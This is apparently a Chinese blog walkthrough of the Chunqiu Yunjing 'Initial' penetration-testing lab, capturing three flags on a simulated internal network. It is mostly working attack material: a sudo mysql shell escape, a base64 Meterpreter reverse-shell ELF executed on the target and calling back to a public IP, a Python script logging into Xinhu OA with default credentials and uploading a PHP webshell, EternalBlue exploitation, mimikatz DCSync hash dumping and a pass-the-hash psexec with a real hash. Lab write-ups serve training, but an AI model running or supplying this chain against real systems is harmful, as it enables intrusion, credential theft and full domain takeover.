春秋云镜initial详解全过程,完整命令
引用
https://blog.csdn.net/uuzeray/article/details/141316323
https://9anux.org/2024/08/01/春秋云境Initial详解/index.html
环境&工具
ubuntu系统vps
安装msf,frp,fscan
本机
安装thinkphp莲花,蚁剑
flag01
访问ip发现是thinkphp服务
用莲花工具一把梭
蚁剑连接
读/root目录需要提权
suid没有可利用的权限命令,打sudo提权
这里显示mysql,说明当前用户可以root身份执行mysql命令
先查flag位置
sudo mysql -e '\! find / -type f -name '*flag*' 2>/dev/null'
再读文件
sudo mysql -e '\! cat /root/flag/flag01.txt'
第一个flag
flag{60b53231-
flag02
msf反弹shell
vps先监听端口
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 你的公网IP或内网IP # ← 必须改!如 192.168.1.100 或 47.92.x.x
set LPORT 6666
exploit
生成反弹的base64字符串用于靶机执行
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.109.49.107 LPORT=6666 -f elf | base64 -w 0
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAaCi9tMWtRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==
复制到靶机执行
sudo mysql -e '\! echo "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAaCi9tMWtRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==" | base64 -d > /tmp/.X; chmod +x /tmp/.X; /tmp/.X &'
上传fscan扫内网服务
先获取一下当前ip
然后扫一下服务
扫描结果
172.22.1.2 DC域控
172.22.1.21 MS17-010永恒之蓝
172.22.1.18?m=login 信呼OA系统
frp做一下内网穿透
https://pic1.imgdb.cn/item/694a08a112468c0fdca41a67.png
frpc.toml细节
serverAddr = "vps的ip"
serverPort = 7000
[[proxies]]
name = "web_test"
type = "tcp"
localIP = "172.22.1.18"
localPort = 80
remotePort = 8081
用exp打信呼OA
import requests
import json
session = requests.Session()
session.verify = False
session.headers.update({
"User-Agent": "Mozilla/5.0"
})
url_pre = "http://47.109.49.107:8081"
# 1. 登录
login_url = url_pre + "/?a=check&m=login&d=&ajaxbool=true"
login_data = {
"rempass": "0",
"jmpass": "false",
"device": "1625884034525",
"ltype": "0",
"adminuser": "YWRtaW4=::", # admin
"adminpass": "YWRtaW4xMjM=", # admin123
"yanzm": ""
}
r = session.post(login_url, data=login_data)
print("\n[+] Login status:", r.status_code)
print("[+] Login response:")
print(r.text)
# 如果这里不是 JSON,基本直接结束
try:
login_json = r.json()
except:
print("[-] Login did not return JSON, stop.")
exit()
# 2. 上传
upload_url = url_pre + "/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true"
files = {
# 有些 CMS 叫 file,有些叫 filedata,你可以两个都试
"file": ("1.php", open("1.php", "rb"), "image/jpeg")
}
r = session.post(upload_url, files=files)
print("\n[+] Upload status:", r.status_code)
print("[+] Upload headers:", r.headers.get("Content-Type"))
print("[+] Upload response:")
print(r.text)
# 强制解析 JSON
try:
upload_json = r.json()
except:
print("[-] Upload did not return JSON, stop.")
exit()
print("[+] Upload JSON keys:", upload_json.keys())
# 常见字段兜底提取
file_id = upload_json.get("id") or upload_json.get("fileid")
filepath = upload_json.get("filepath") or upload_json.get("path")
print("[+] file_id:", file_id)
print("[+] filepath:", filepath)
if not file_id:
print("[-] No file_id, cannot continue")
exit()
# 3. 触发 task.php
task_url = url_pre + f"/task.php?m=qcloudCos|runt&a=run&fileid={file_id}"
r = session.get(task_url)
print("\n[+] Task trigger status:", r.status_code)
print("[+] Task response:")
print(r.text)
# 4. 如果你想直接访问文件(有些环境不需要 task)
if filepath:
if ".uptemp" in filepath:
filepath = "/" + filepath.split(".uptemp")[0] + ".php"
elif not filepath.startswith("/"):
filepath = "/" + filepath
shell_url = url_pre + filepath
print("\n[+] Try access uploaded file:")
print(shell_url)
r = session.get(shell_url)
print("[+] Shell access response:")
print(r.text)
用ai改的脚本打,原来的不知道为什么打不了
蚁剑连接
这个路径我也没找到,看的解析。
flag02: 2ce3-4813-87d4-
flag03
先打一开始被扫到的永恒之蓝
SOCKS 只能代理“我主动连别人”
FRP / 转发 才能让“别人连我”
# 1. 转到后台
background
# 2. 使用 EternalBlue 漏洞利用模块
use exploit/windows/smb/ms17_010_eternalblue
# 3. 设置攻击目标 IP
set RHOSTS 172.22.1.21
# 4. 设置载荷为 bind_tcp_uuid(绑定型,便于后续连接)
set payload windows/x64/meterpreter/bind_tcp_uuid
# 5. 执行漏洞利用
exploit
打完永恒之蓝打域控
先获取密钥
load kiwi
Loading extension kiwi...
.#####.
mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX (vincent.letoux@gmail.com)
'#####' > http://pingcastle.com / http://mysmartlogon.com
***/
Success.
然后执行DCSync,目标是拿到:Administrator 的 NTLM hash或任意 Domain Admin
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
然后打PTH
use exploit/windows/smb/psexec
set RHOSTS 172.22.1.2
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:10cf89a850fb1cdbe6bb432b859164c8
set SMBDomain xiaorang.lab
set PAYLOAD windows/x64/meterpreter/bind_tcp
exploit
more C:\Users\Administrator\flag\flag03.txt
flag03: e8f88d0d43d6}
总结&收获
内网的基本结构,域概念
frp内网穿透
msf基本使用
内网渗透基本流程
浙公网安备 33010602011771号